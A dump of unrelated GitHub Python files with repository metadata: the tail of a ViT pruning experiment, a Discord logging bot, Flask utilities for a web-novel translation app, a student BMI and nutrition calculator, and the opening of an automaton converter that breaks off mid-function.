get_optimizer(net)\n log = finetune(net, prune_mask, optimizer, scheduler, train_loader, device, num_epochs, verbose, initial_accuracy)\n\n val_acc = val(net, val_loader, device)\n if verbose: print('after finetune {:.4f}: {}'.format(net.sparsity(), val_acc))\n logger[r]['val_acc/after_finetune'] = val_acc\n\n print(logger[r])\n print(log)\n logger[r].update(log)\n\n if track_masks:\n mask_tracker[r] = prune_mask \n\n # model checkpointing\n state_dict = {\n 'ratio': r,\n 'post_pruning_val_acc':val_acc,\n 'model_state_dict': net.state_dict()\n }\n if finetuning_on and val_acc < (init_acc - 0.01):\n state_dict.update({\n 'optimizer_state_dict': optimizer.state_dict(),\n 'scheduler_state_dict': scheduler.state_dict()\n })\n state_dict.update({\"prune_mask\":prune_mask})\n \n ckpt_dir = \"./vit_pruning/logs/\"+experiment_name\n if not os.path.exists(ckpt_dir):\n os.makedirs(ckpt_dir)\n path = os.path.join(ckpt_dir, str(r).replace(\".\", \"_\")+\".pt\")\n print('Saved state dict to', path, \"\\n\")\n torch.save(state_dict, path)\n\n \n if track_masks:\n return logger, mask_tracker\n return logger\n\n","repo_name":"sarahlc888/vit-pruning","sub_path":"vit_pruning/experiments.py","file_name":"experiments.py","file_ext":"py","file_size_in_byte":6874,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"31487255598","text":"import discord\nimport logging\nimport botToken\nimport sqlalchemy as sqlAlchemy\nimport mysql_interface.integrity_helper as integrityHelper\nimport mysql_interface.mysql_constants as mysqlConstants\nimport mysql_interface.mapping as mysqlMapping\n\n\n# Logging initialization\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger('discord')\nlogger.setLevel(logging.DEBUG)\n\n\ndef verify_database_integrity():\n # If no database found, exit\n if not integrityHelper.get_database_connection():\n exit()\n\n # Create all relevant databases\n for table in mysqlMapping.tables:\n databaseUri = mysqlConstants.create_database_uri_by_string(table)\n integrityHelper.create_database_if_not_exists(databaseUri)\n\n\n# Check database integrity before starting the bot\nverify_database_integrity()\nmessageEngine = sqlAlchemy.create_engine(\n mysqlConstants.create_database_uri_by_string(mysqlMapping.messageLogTableName))\nmessageEngine.connect()\nintegrityHelper.check_if_table_exists_on_db(\n messageEngine, mysqlMapping.messageLogTableName)\n\nuserEngine = sqlAlchemy.create_engine(\n mysqlConstants.create_database_uri_by_string(mysqlMapping.userTableName))\nuserEngine.connect()\nintegrityHelper.check_if_table_exists_on_db(\n userEngine, mysqlMapping.userTableName)\n\nserverEngine = sqlAlchemy.create_engine(\n mysqlConstants.create_database_uri_by_string(mysqlMapping.serverTableName))\nserverEngine.connect()\nintegrityHelper.check_if_table_exists_on_db(\n serverEngine, mysqlMapping.serverTableName)\n\n\n# Create discord client and register on events\nclient = discord.Client()\n\n\n@client.event\nasync def on_ready():\n print('We have logged in as \"{0.user}\"'.format(client))\n\n\n@client.event\nasync def on_message(message):\n # All messages run into this function\n if message.author == client.user:\n return\n\n if message.content.startswith('$hello'):\n await message.channel.send('Hello!')\n\nclient.run(botToken.token)\n","repo_name":"tkerkering/discord_logging_bot","sub_path":"startup.py","file_name":"startup.py","file_ext":"py","file_size_in_byte":1959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40366157337","text":"import os\nimport io\nimport re\nimport json\nimport requests\n\n# Flask imports\nfrom flask import url_for\n\n# Internal imports\nfrom app import app\nfrom app import db\n\nfrom app.forms import *\nfrom app.models import *\n\nfrom app.scripts.hostmanager import *\nfrom app.scripts.custom_errors import *\nfrom app.scripts.dictionary import *\n\n\n\n@app.before_first_request\ndef init():\n\t\"\"\"-------------------------------------------------------------------\n\t\tFunction:\t\t[init]\n\t\tDescription:\tInitializes the web server file system and database in\n\t\t\t\t\t\tpreparation for serving requests. Runs once before the first\n\t\t\t\t\t\tserver request\n\t\tInput:\t\t\tNone\n\t\tReturn: \t\tNone, initializes the database if necessary on app start\n\t\t------------------------------------------------------------------\n\t\"\"\"\n\t# Create user path if it does not already exist\n\tif not os.path.isdir(app.config['USER_PATH']):\n\t\tos.makedirs(app.config['USER_PATH'])\n\n\tdb_path = os.path.join(app.config['USER_PATH'], app.config['SQLALCHEMY_DATABASE_NAME'])\n\tif not os.path.isfile(db_path):\n\t\tdb.create_all()\n\telif os.stat(db_path).st_size == 0:\n\t\tos.remove(db_path)\n\t\tdb.create_all()\n\telse:\n\t\t# No initialization needed\n\t\treturn\n\n\t# HostTable can't be empty on execution of the flask app\n\tif len(HostTable.query.all()) == 0:\n\t\thosts_path = os.path.join(app.config['SEED_DATA_PATH'], \"hosts.json\")\n\t\tprint(\"No hosts found in the database... Seeding hosts from disk: \\'%s\\'\" % hosts_path)\n\t\tseedHosts(hosts_path, mode='overwrite')\n\n\t# DictionaryTable should minimally have the common dictionary registered\n\tif DictionaryTable.query.filter_by(fname=COMMON_DICT_FNAME).first() is None:\n\t\t# Add the common dictionary\n\t\tdict_entry = DictionaryTable(fname=COMMON_DICT_FNAME)\n\t\tdb.session.add(dict_entry)\n\t\tdb.session.commit()\n\n\t# Initialize SettingsTable\n\tsettings_entry = SettingsTable()\n\tdb.session.add(settings_entry)\n\tdb.session.commit()\n\n\t# In development and testing, we need series and honorifics to be seeded\n\t# with test values\n\tif app.config[\"ENV\"] in [\"development\", \"testing\"]:\n\t\tprint(\"Reseeding series and honorifics entries\")\n\t\tseedHonorifics(os.path.join(app.config['SEED_DATA_PATH'], \"honorifics.json\"), mode='overwrite')\n\t\tseedSeries(os.path.join(app.config['SEED_DATA_PATH'], \"test_series.json\"), mode='overwrite')\n\ndef fetchHtml(url):\n\t\"\"\"-------------------------------------------------------------------\n\t\tFunction:\t\t[fetchHtml]\n\t\tDescription:\tTries to prompt a response url and return the received\n\t\t\t\t\t\tHTML content as a UTF-8 decoded string\n\t\tInput:\n\t\t [url]\t\t\tThe url to make the request to\n\t\tReturn: \t\tThe HTML content of the given website address\n\t\t------------------------------------------------------------------\n\t\"\"\"\n\ttry:\n\t\tcookies = { 'over18': 'yes' }\n\t\theaders = { 'User-Agent': 'Mozilla/5.0' }\n\t\tresponse = requests.get(url,\n\t\t\tcookies=cookies,\n\t\t\theaders=headers,\n\t\t\tverify=False)\n\n\t\tif not response.status_code == 200:\n\t\t\traise Exception\n\texcept:\n\t\traise HtmlFetchException(url)\n\n\treturn response.text\n\ndef getLatestChapter(series_code, host_entry):\n\t\"\"\"-------------------------------------------------------------------\n\t\tFunction:\t\t[getLatestChapter]\n\t\tDescription:\tFetches the latest chapter directly from the series's host\n\t\tInput:\n\t\t [series_code]\tThe identifying series code\n\t\t [host_entry] \tThe HostTable entry associated with this series\n\t\tReturn:\t\t\tLatest chapter number\n\t\t------------------------------------------------------------------\n\t\"\"\"\n\thost_manager = createManager(host_entry.host_type)\n\tsource_url = host_manager.generateSeriesUrl(series_code)\n\tsource_html = fetchHtml(source_url)\n\tres = host_manager.getLatestChapter(source_html)\n\n\treturn res\n\ndef generateSeriesVolumes(series_entry):\n\t\"\"\"-------------------------------------------------------------------\n\t\tFunction:\t\t[generateSeriesVolumes]\n\t\tDescription:\tGenerates volumes entries for the given series\n\t\tInput:\n\t\t [series_code]\tThe identifying series code\n\t\t [host_entry] \tThe HostTable entry associated with this series\n\t\tReturn:\t\t\tNone\n\t\t------------------------------------------------------------------\n\t\"\"\"\n\thost_manager = createManager(series_entry.host.host_type)\n\tsource_url = host_manager.generateSeriesUrl(series_entry.code)\n\tsource_html = fetchHtml(source_url)\n\tvolumes = host_manager.getVolumesData(source_html)\n\t# Add volumes\n\tfor volume in volumes:\n\t\tvolume_entry = VolumeTable(\n\t\t\tnumber=volume[\"num\"],\n\t\t\ttitle=volume[\"title\"],\n\t\t\tseries=series_entry\n\t\t)\n\t\tdb.session.add(volume_entry)\n\t\tdb.session.commit()\n\n\t\t# Add chapters\n\t\tfor ch in volume[\"chapters\"]:\n\t\t\tchapter_url = host_manager.generateChapterUrl(series_entry.code, ch[\"number\"], series_entry.page_table)\n\t\t\tchapter_entry = ChapterTable(\n\t\t\t\tnumber=ch[\"number\"],\n\t\t\t\ttitle=ch[\"title\"],\n\t\t\t\tdate_posted=ch[\"date_posted\"],\n\t\t\t\turl=chapter_url,\n\t\t\t\tvolume=volume_entry\n\t\t\t)\n\t\t\tdb.session.add(chapter_entry)\n\t\tdb.session.commit()\n\ndef getChapterDbEntry(series_id, ch):\n\t\"\"\"-------------------------------------------------------------------\n\t\tFunction:\t\t[getChapterDbEntry]\n\t\tDescription:\tFetches the database entry corresponding to chapter ch\n\t\t\t\t\t\tof the given series\n\t\tInput:\n\t\t [series_id]\tThe series_id of the Series associated with the chapter\n\t\t [ch] \t\t\tThe chapter to fetch\n\t\tReturn:\t\t\tChapterTable database entry\n\t\t------------------------------------------------------------------\n\t\"\"\"\n\tchapter_entry = ChapterTable.query \\\n\t\t\t\t\t\t.filter(ChapterTable.number == ch) \\\n\t\t\t\t\t\t.join(ChapterTable.volume) \\\n\t\t\t\t\t\t.join(VolumeTable.series) \\\n\t\t\t\t\t\t.filter(SeriesTable.id == series_id).first()\n\treturn chapter_entry\n\ndef getAllSeriesChapterDbEntries(series_id):\n\t\"\"\"-------------------------------------------------------------------\n\t\tFunction:\t\t[getAllSeriesChapterDbEntries]\n\t\tDescription:\tFetches the database entry corresponding to chapter ch\n\t\t\t\t\t\tof the given series\n\t\tInput:\n\t\t [series_id]\tThe series_id to fetch all chapters for\n\t\tReturn:\t\t\tlist of all ChapterTable database entries attached to given series\n\t\t------------------------------------------------------------------\n\t\"\"\"\n\tchapter_entries = ChapterTable.query \\\n\t\t\t\t\t\t.join(ChapterTable.volume) \\\n\t\t\t\t\t\t.join(VolumeTable.series) \\\n\t\t\t\t\t\t.filter(SeriesTable.id == series_id).first()\n\treturn chapter_entries\n\ndef getFileExtension(filename):\n\t\"\"\"-------------------------------------------------------------------\n\t\tFunction:\t\t[getFileExtension]\n\t\tDescription:\tFetches the latest chapter directly from the series's host\n\t\tInput:\n\t\t [series_code]\tThe identifying series code\n\t\t [host_entry] \tThe HostTable entry associated with this series\n\t\tReturn:\t\t\tLatest chapter number\n\t\t------------------------------------------------------------------\n\t\"\"\"\n\tif not '.' in filename:\n\t\treturn None\n\n\treturn filename.split('.')[-1]\n\ndef registerSeriesToDatabase(reg_form):\n\t\"\"\"-------------------------------------------------------------------\n\t\tFunction:\t\t[registerSeriesToDatabase]\n\t\tDescription:\tPushes user series info to database initializing\n\t\t\t\t\t\tthe associated dictionary as well\n\t\tInput:\n\t\t [reg_form] \tThe Flask novel registration form to process\n\t\tReturn:\t\t\tThe new series as a db Table entry\n\t\t\t\t\t\tNone if error encountered\n\t\t------------------------------------------------------------------\n\t\"\"\"\n\t# Rip relevant information\n\thost_entry = reg_form.series_host.data\n\thost_manager = createManager(host_entry.host_type)\n\n\tseries_title = reg_form.title.data.strip()\n\tseries_abbr = reg_form.abbr.data.strip()\n\tseries_code = reg_form.series_code.data.strip()\n\tseries_url = host_manager.generateSeriesUrl(series_code)\n\n\tdict_fname = generateDictFilename(series_abbr, host_entry.host_name, series_code)\n\tdict_entry = None\n\n\t# Check for preexisting dictionary if this series is being re-registered\n\tfor entry in DictionaryTable.query.all():\n\t\tdict_info = spliceDictName(entry.fname)\n\t\tif dict_info is not None:\n\t\t\t(_, host, code) = dict_info\n\t\t\tif host == host_entry.host_name and code == series_code:\n\t\t\t\tdict_entry = entry\n\t\t\t\tif dict_entry.fname != dict_fname:\n\t\t\t\t\trenameDictFile(dict_entry.fname, dict_fname)\n\t\t\t\t\tdict_entry.fname = dict_fname\n\t\t\t\tbreak\n\n\t# If an existing dictionary is not found, make a new entry\n\tif dict_entry is None:\n\t\tdict_entry = DictionaryTable(fname=dict_fname)\n\tdb.session.add(dict_entry)\n\tdb.session.commit()\n\n\tdict_dir = app.config['DICTIONARIES_PATH']\n\tif not os.path.exists(dict_dir):\n\t\tos.makedirs(dict_dir)\n\n\t# Check the physical file,\n\tdict_path = os.path.join(dict_dir, dict_fname)\n\tif not os.path.exists(dict_path):\n\t\t# First traverse the dict files to see if there is a dict file with the same host-code combination\n\t\t# This implies the user has registered and removed this series before with the preserve dictionary\n\t\t# option enabled and is currently trying to reregister that same series\n\t\tdict_initialized = False\n\t\tfor dict_file in os.listdir(app.config['DICTIONARIES_PATH']):\n\t\t\tif os.path.isfile(os.path.join(app.config['DICTIONARIES_PATH'], dict_file)):\n\t\t\t\tinfo = spliceDictName(dict_file)\n\t\t\t\tif info is not None:\n\t\t\t\t\t(_, host, code) = info\n\t\t\t\t\tif host == host_entry.host_name and code == series_code:\n\t\t\t\t\t\t# Found a dict file with matching host+code, rename it and use it for this series dict\n\t\t\t\t\t\trenameDictFile(dict_file, dict_fname)\n\t\t\t\t\t\tupdateDictMetaHeader(dict_fname, series_title, series_abbr)\n\t\t\t\t\t\tdict_initialized = True\n\t\t\t\t\t\tbreak\n\n\t\t# Dict with this host+code combination wasn't found, create a new one from scratch\n\t\tif not dict_initialized:\n\t\t\tcreateDictFile(dict_fname, series_title, series_abbr, series_url)\n\n\t# If the dict exists but is empty, repopulate it with the dictionary skeleton text\n\tif os.path.getsize(dict_path) == 0:\n\t\tcreateDictFile(dict_fname, series_title, series_abbr, series_url)\n\n\t# Build the table for the series\n\tpage_table = host_manager.parsePageTableFromWeb(series_code)\n\tlatest_chapter = getLatestChapter(series_code, host_entry)\n\tseries_entry = SeriesTable(\n\t\tcode=series_code,\n\t\ttitle=series_title,\n\t\tabbr=series_abbr,\n\t\tcurrent_ch=0,\n\t\tlatest_ch=latest_chapter,\n\t\tpage_table=page_table,\n\t\turl=series_url,\n\t\tdictionary=dict_entry,\n\t\thost=host_entry\n\t)\n\tdb.session.add(series_entry)\n\tdb.session.commit()\n\n\t# Generate all series volumes\n\tgenerateSeriesVolumes(series_entry)\n\n\treturn series_entry\n\ndef updateSeries(series_entry):\n\t\"\"\"-------------------------------------------------------------------\n\t\tFunction:\t\t[updateSeries]\n\t\tDescription:\tUpdates a specific series\n\t\tInput:\n\t\t [series_entry] The series to update\n\t\tReturn:\t\t\tNumber of chapter updates on success\n\t\t------------------------------------------------------------------\n\t\"\"\"\n\thost_entry = HostTable.query.filter_by(id=series_entry.host_id).first()\n\told_latest = series_entry.latest_ch\n\tnew_latest = getLatestChapter(series_entry.code, host_entry)\n\tnum_new_chapters = new_latest - old_latest\n\n\tif num_new_chapters > 0:\n\t\thost_manager = createManager(host_entry.host_type)\n\t\tseries_entry.latest_ch = new_latest\n\t\tseries_entry.page_table = host_manager.parsePageTableFromWeb(series_entry.code)\n\t\tfor volume_entry in series_entry.volumes:\n\t\t\tdb.session.delete(volume_entry)\n\t\tdb.session.commit()\n\n\t\t# Re-generate volumes\n\t\tgenerateSeriesVolumes(series_entry)\n\n\treturn num_new_chapters\n\ndef applyDictionaryToContent(content, series_dict):\n\t\"\"\"-------------------------------------------------------------------\n\t\tFunction:\t\t[applyDictionaryToContent]\n\t\tDescription:\tApplies the designated series dictionary to the given\n\t\t\t\t\t\tstory content\n\t\tInput:\n\t\t [series_abbr] The abbreviation of the series\n\t\t [content]\t\tFormatted chapter content gotten from hostmanager\n\t\tReturn: \t\tNone, mutates content\n\t\t------------------------------------------------------------------\n\t\"\"\"\n\t# Helper function that generates a placeholder element with the given id\n\tdef generatePlaceholder(id):\n\t\treturn \"placeholder\" % id\n\n\t# Preprocess line using dictionary entities\n\tseries_dict_list = list(series_dict.items())\n\tfor i in range(0, len(content)):\n\t\tif content[i][\"type\"] == \"text\":\n\t\t\tfor j in range(0, len(series_dict)):\n\t\t\t\t(def_raw, (def_trans, def_comment)) = series_dict_list[j]\n\t\t\t\tif def_raw in content[i][\"text\"]:\n\t\t\t\t\tcontent[i][\"text\"] = content[i][\"text\"].replace(def_raw, generatePlaceholder(j+1))\n\ndef addHonorificToDatabase(honorific_add_form):\n\t\"\"\"-------------------------------------------------------------------\n\t\tFunction:\t\t[addHonorificToDatabase]\n\t\tDescription:\tAdds the honorific indicated in the form to the database\n\t\tInput:\n\t\t [honorific_add_form] The submitted Honorific Add form\n\t\tReturn: \t\tReturns new honorific entry on success, None otherwise\n\t\t------------------------------------------------------------------\n\t\"\"\"\n\t# Rip relevant information\n\tlang = Language(honorific_add_form.lang.data)\n\thraw = honorific_add_form.hraw.data.strip()\n\thtrans = honorific_add_form.htrans.data.strip()\n\n\taffix = HonorificAffix(honorific_add_form.affix.data)\n\topt_with_dash = honorific_add_form.opt_with_dash.data\n\topt_standalone = honorific_add_form.opt_standalone.data\n\n\thonorific_entry = HonorificsTable(\n\t\tlang=lang,\n\t\traw=hraw,\n\t\ttrans=htrans,\n\t\taffix=affix,\n\t\topt_with_dash=opt_with_dash,\n\t\topt_standalone=opt_standalone,\n\t\tenabled=True\n\t)\n\tdb.session.add(honorific_entry)\n\tdb.session.commit()\n\n\treturn honorific_entry\n\ndef editHonorific(hon_id, honorific_edit_form):\n\t\"\"\"-------------------------------------------------------------------\n\t\tFunction:\t\t[addHonorificToDatabase]\n\t\tDescription:\tChanges the data of the honorific with the designated id\n\t\t\t\t\t\tin the database\n\t\tInput:\n\t\t [honorific_edit_form] The submitted Honorific Edit form\n\t\tReturn: \t\tReturns edited honorific entry on success, None otherwise\n\t\t------------------------------------------------------------------\n\t\"\"\"\n\ttry:\n\t\thon_entry = HonorificsTable.query.filter_by(id=hon_id).first()\n\t\tif hon_entry is None:\n\t\t\traise HonorificDNEException(hon_id)\n\n\t\t# Apply edits\n\t\thon_entry.lang = Language(honorific_edit_form.lang.data)\n\t\thon_entry.raw = honorific_edit_form.hraw.data.strip()\n\t\thon_entry.trans = honorific_edit_form.htrans.data.strip()\n\t\thon_entry.affix = HonorificAffix(honorific_edit_form.affix.data)\n\t\thon_entry.opt_with_dash = honorific_edit_form.opt_with_dash.data\n\t\thon_entry.opt_standalone = honorific_edit_form.opt_standalone.data\n\n\t\tdb.session.commit()\n\t\treturn hon_entry\n\texcept:\n\t\treturn None\n\n\ndef customTrans(series_entry, ch):\n\t\"\"\"-------------------------------------------------------------------\n\t\tFunction:\t\t[customTrans]\n\t\tDescription:\tGenerates the pre-processed data necessary to populate\n\t\t\t\t\t\tthe chapter template\n\t\tInput:\n\t\t [series_entry]The series db entry to generate the customtrans chapter for\n\t\t [ch]\t\t\tThe integer indicating the chapter number\n\t\tReturn: \t\tReturns a tuple consisting of the chapter data and\n\t\t\t\t\t\tthe series dictionary structure\n\t\t------------------------------------------------------------------\n\t\"\"\"\n\thost_entry = HostTable.query.filter_by(id=series_entry.host_id).first()\n\n\t# First fetch the html\n\thost_manager = createManager(host_entry.host_type)\n\tchapter_entry = getChapterDbEntry(series_entry.id, ch)\n\tchapter_html = fetchHtml(chapter_entry.url)\n\n\t# Parse out relevant content from the website source code\n\tchapter_content = host_manager.parseChapterContent(chapter_html)\n\tseries_dict = initSeriesDict(series_entry.abbr)\n\tapplyDictionaryToContent(chapter_content, series_dict)\n\n\t# Done, pack all the data together and return it to the client\n\tchapter_data = {\n\t\t\"title\": \t\tnext(datum for datum in chapter_content if datum['ltype'] == LType.TITLE),\n\t\t\"prescript\": \t[datum for datum in chapter_content if datum['ltype'] == LType.PRESCRIPT],\n\t\t\"main\": \t\t[datum for datum in chapter_content if datum['ltype'] == LType.MAIN],\n\t\t\"postscript\": \t[datum for datum in chapter_content if datum['ltype'] == LType.POSTSCRIPT],\n\t\t\"dictionary\":\t[{\"trans\":t, \"comment\":c} for (_, (t, c)) in series_dict.items()]\n\t}\n\treturn chapter_data\n\ndef seedSeries(series_json_path, mode='append'):\n\t\"\"\"-------------------------------------------------------------------\n\t\tFunction:\t\t[seedSeries]\n\t\tDescription:\tSeeds the SeriesTable on the database using series found\n\t\t\t\t\t\tin the given json file\n\t\tInput:\n\t\t [series_json_path] Path to the json file containing the series to seed\n\t\t [mode]\t\tIf 'overwrite', drops SeriesTable data before seeding\n\t\t \t\t\t\tDefault 'append' will append to SeriesTable\n\t\tReturn:\t\t\tNone, reseeds HostTable\n\n\t\tPRECONDITION: \tHostTable contains a row for the hosts referred to by the\n\t\t\t\t\t\tseries in the given json\n\t\t------------------------------------------------------------------\n\t\"\"\"\n\tprint(\"Seeding database's SeriesTable and DictionaryTable from \\'%s\\' in \\'%s\\' mode\" %\n\t\t(series_json_path, mode))\n\n\tif mode == 'overwrite':\n\t\tSeriesTable.__table__.drop(db.engine)\n\t\tDictionaryTable.__table__.drop(db.engine)\n\t\tdb.metadata.create_all(db.engine, tables=[\n\t\t\tSeriesTable.__table__,\n\t\t\tDictionaryTable.__table__])\n\n\t\t# Add back the common dictionary\n\t\tdict_entry = DictionaryTable(fname=\"common_dict.dict\")\n\t\tdb.session.add(dict_entry)\n\t\tdb.session.commit()\n\n\n\t# Populate database from json\n\twith open(series_json_path, mode='r') as series_json:\n\t\tseries_content = json.loads(series_json.read())\n\t\tfor entry in series_content['series']:\n\t\t\thost_entry = HostTable.query.filter_by(host_type=Host.to_enum(entry['host'])).first();\n\t\t\t# Submit dictionary to database\n\t\t\tdict_fname = generateDictFilename(entry['abbr'], host_entry.host_name, entry['code'])\n\t\t\tdict_entry = DictionaryTable(fname=dict_fname)\n\t\t\tdb.session.add(dict_entry)\n\t\t\tdb.session.commit()\n\n\t\t\t# Create series entry in database\n\t\t\thost_manager = createManager(host_entry.host_type)\n\t\t\tpage_table = host_manager.parsePageTableFromWeb(entry['code'])\n\t\t\tseries_url = host_manager.generateSeriesUrl(entry['code'])\n\t\t\tseries_entry = SeriesTable(\n\t\t\t\tcode=entry['code'],\n\t\t\t\ttitle=entry['title'],\n\t\t\t\tabbr=entry['abbr'],\n\t\t\t\tcurrent_ch=entry['current'],\n\t\t\t\tlatest_ch=entry['latest'],\n\t\t\t\tpage_table=page_table,\n\t\t\t\turl=series_url,\n\t\t\t\tdictionary=dict_entry,\n\t\t\t\thost=host_entry\n\t\t\t)\n\t\t\tdb.session.add(series_entry)\n\t\t\tdb.session.commit()\n\n\t\t\ttry:\n\t\t\t\t# Generate series volumes data\n\t\t\t\tgenerateSeriesVolumes(series_entry)\n\t\t\t\tfor volume in series_entry.volumes:\n\t\t\t\t\tfor chapter in volume:\n\t\t\t\t\t\tif chapter.number in entry['bookmarks']:\n\t\t\t\t\t\t\tchapter.bookmarked = True\n\n\t\t\texcept:\n\t\t\t\tpass\n\t\tdb.session.commit()\n\ndef seedHosts(hosts_json_path, mode='append'):\n\t\"\"\"-------------------------------------------------------------------\n\t\tFunction:\t\t[seedHosts]\n\t\tDescription:\tDrops any HostTable data currently in the database and\n\t\t\t\t\t\treseeds it from seed_data/hosts.json\n\t\tInput:\t\t\tNone\n\t\tReturn:\t\t\tNone, reseeds HostTable\n\t\t------------------------------------------------------------------\n\t\"\"\"\n\tprint(\"Seeding database's HostTable from \\'%s\\' in \\'%s\\' mode\" %\n\t\t(hosts_json_path, mode))\n\n\t# Drop and recreate this table on option 'overwrite'\n\tif mode == 'overwrite':\n\t\tHostTable.__table__.drop(db.engine)\n\t\tdb.metadata.create_all(db.engine, tables=[HostTable.__table__])\n\n\t# Populate database from json\n\twith open(hosts_json_path, mode='r') as hosts_json:\n\t\thosts_content = json.loads(hosts_json.read())\n\t\tfor entry in hosts_content[\"hosts\"]:\n\t\t\thost_entry = HostTable(\n\t\t\t\thost_type=Host.to_enum(entry['host_type']),\n\t\t\t\thost_name=entry['host_name'],\n\t\t\t\thost_lang=Language.to_enum(entry['host_lang']),\n\t\t\t\thost_url=entry['host_url'],\n\t\t\t\thost_search_engine=entry['host_search_engine'])\n\t\t\tdb.session.add(host_entry)\n\t\tdb.session.commit()\n\ndef seedHonorifics(honorifics_json_path, mode='append'):\n\t\"\"\"-------------------------------------------------------------------\n\t\tFunction:\t\t[seedHonorifics]\n\t\tDescription:\tDrops any HonorificsTable data currently in the database\n\t\t\t\t\t\tand reseeds it from seed_data/honorifics.json\n\t\tInput:\t\t\tNone\n\t\tReturn:\t\t\tNone, reseeds HostTable\n\t\t------------------------------------------------------------------\n\t\"\"\"\n\tprint(\"Seeding database's HonorificsTable from \\'%s\\' in \\'%s\\' mode\" %\n\t\t(honorifics_json_path, mode))\n\n\t# Drop and recreate this table on option 'overwrite'\n\tif mode == 'overwrite':\n\t\tHonorificsTable.__table__.drop(db.engine)\n\t\tdb.metadata.create_all(db.engine, tables=[HonorificsTable.__table__])\n\n\t# Populate database from json\n\twith io.open(honorifics_json_path, mode='r', encoding='utf8') as honorifics_json:\n\t\thonorifics_content = json.loads(honorifics_json.read())\n\t\tfor lang in Language:\n\t\t\tfor entry in honorifics_content[Language.to_string(lang)]:\n\t\t\t\thonorific_entry = HonorificsTable(\n\t\t\t\t\tlang=lang,\n\t\t\t\t\traw=entry[\"raw\"],\n\t\t\t\t\ttrans=entry[\"trans\"],\n\t\t\t\t\topt_standalone=entry[\"standalone\"],\n\t\t\t\t)\n\t\t\t\tdb.session.add(honorific_entry)\n\t\tdb.session.commit()","repo_name":"tahmidk/wn-customtrans","sub_path":"flaskapp/app/scripts/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":20626,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"24428655246","text":"name = input('Name: ')\r\nage = int(input('Age: '))\r\ngender = input('Enter M for male or F for female: ')\r\nweight = float(input('Enter your weight in pounds: '))\r\nheight = float(input('Lastly, enter your height in inches: '))\r\n\r\n# round(float, 2)\r\nbmi = round(((weight/height**2)*703),2)\r\n\r\nif bmi < 16:\r\n print(f'Oh NO, You are severly underweight. (Your BMI is {bmi})!!!')\r\nelif bmi >= 16 and bmi < 18.5:\r\n print(f'NOoooo, You are underweight!!!. (Your BMI is {bmi})')\r\nelif bmi >= 18.5 and bmi < 25:\r\n print(f'Ohkk Good, You are Healthy :). (Your BMI is {bmi})')\r\nelif bmi >= 25 and bmi < 30:\r\n print(f'Man, You are Overweight, do gym ;). (Your BMI is {bmi})')\r\nelse:\r\n print(f'Damn, You are obese, try fasting... (Your BMI is {bmi})')\r\n\r\n\r\n# Nutrition Calculation\r\n\r\nprint()\r\nfoods = {'Milk':100, 'Egg':155, 'Rice':130,'Lentils':113,'Vegetables':85,'Meat':143}\r\n\r\nprint('Your nutrition caclculation::')\r\ncalorie = {}\r\ntotal_calories = 0\r\nfor i in foods.keys():\r\n calorie[i] = float(input(f'Quantity for the food {i}: '))\r\n total_calories += ((foods[i]/100)*calorie[i])\r\n \r\nprint(\"Your total calorie intake is \",total_calorie)\r\n\r\nif age >= 0 and age < 2:\r\n if total_calories >= 800:\r\n print(f'You are properly nourished as the recommneded calories for you is\\\r\n 800 and your calorie intake is {total_calories}')\r\n else:\r\n print(f'You are malnourished as the recommneded calories for you is\\\r\n 800 and your calorie intake is {total_calories}')\r\nelif age >=2 and age < 4:\r\n if total_calories >= 1400:\r\n print(f'You are properly nourished as the recommneded calories for you is\\\r\n 1400 and your calorie intake is {total_calories}')\r\n else:\r\n print(f'You are malnourished as the recommneded calories for you is\\\r\n 1400 and your calorie intake is {total_calories}')\r\nelif age >=4 and age < 8:\r\n if total_calories >= 1800:\r\n print(f'You are properly nourished as the recommneded calories for you is\\\r\n 1800 and your calorie intake is {total_calories}')\r\n else:\r\n print(f'You are malnourished as the recommneded calories for you is\\\r\n 1800 and your calorie intake is {total_calories}')\r\nelse:\r\n print('Sorry, you are not a child!! Can\\'t use it')\r\n \r\n\r\n\r\n","repo_name":"Jugraj2021/PythonProjects","sub_path":"Nutrition_calculator.py","file_name":"Nutrition_calculator.py","file_ext":"py","file_size_in_byte":2209,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"1750389585","text":"# Integrantes: Gabriel Reis Panho, Gabriel Tasca Villa e João Victor Zucco Marmentini\n\nimport sys\nimport copy\nimport networkx as nx\nfrom networkx.algorithms.assortativity import neighbor_degree\nfrom networkx.classes import graph\n\n\nclass automata:\n def __init__(self, states, gramatic, initial_state, final_states):\n self.states = states\n self.gramatic = gramatic\n self.initial_state = initial_state\n self.final_states = final_states\n\n\ndef readFile(file_path):\n with open(file_path) as file:\n lines = file.readlines()\n for i in range(len(lines)):\n lines[i] = lines[i].replace(\"\\n\", \"\")\n lines[0] = lines[0].replace(\n \"AUTÔMATO=(\", \"\").replace(\")\", \"\").split(\"},\")\n lines[2] = lines[2].replace(\"Prog\", \"\")\n temp = lines[0][2].split(\",{\")\n lines[0][2] = temp[0]\n lines[0].append(temp[1])\n lines[0] = [c.replace('{', '').replace('}', '') for c in lines[0]]\n lines = list(filter(None, lines))\n for i, func in enumerate(lines[1:]):\n lines[i+1] = func.replace(\")=\", \",\").replace(\"(\", \"\").split(\",\")\n return lines\n\n\ndef nd2d_converter(rfile, nd_automata):\n a1 = automata(\n states=rfile[0][0].split(\",\"),\n gramatic=rfile[0][1].split(\",\"),\n initial_state=rfile[0][2],\n final_states=rfile[0][3].split(\",\")\n )\n\n for node in a1.states:\n nd_automata.add_node(\n node, initial=node in a1.initial_state, final=node in a1.final_states)\n\n for func in rfile[1:]:\n nd_automata.add_edge(func[0], func[2],\n label=func[1])\n\n grammy = {sym: [] for sym in a1.gramatic}\n open_list = [[a1.initial_state]]\n closed_list = []\n new_automata = {}\n while(len(open_list) > 0):\n for element in open_list[0]:\n for neighbor in nd_automata.neighbors(element):\n edges = nd_automata.get_edge_data(element, neighbor)\n for sym in edges:\n if(neighbor not in grammy[edges[sym][\"label\"]]):\n grammy[edges[sym][\"label\"]].append(neighbor)\n grammy[edges[sym][\"label\"]].sort()\n new_automata[\"\".join(open_list[0])] = copy.deepcopy(grammy.copy())\n closed_list.append(open_list.pop(0))\n for sym in grammy:\n if (not 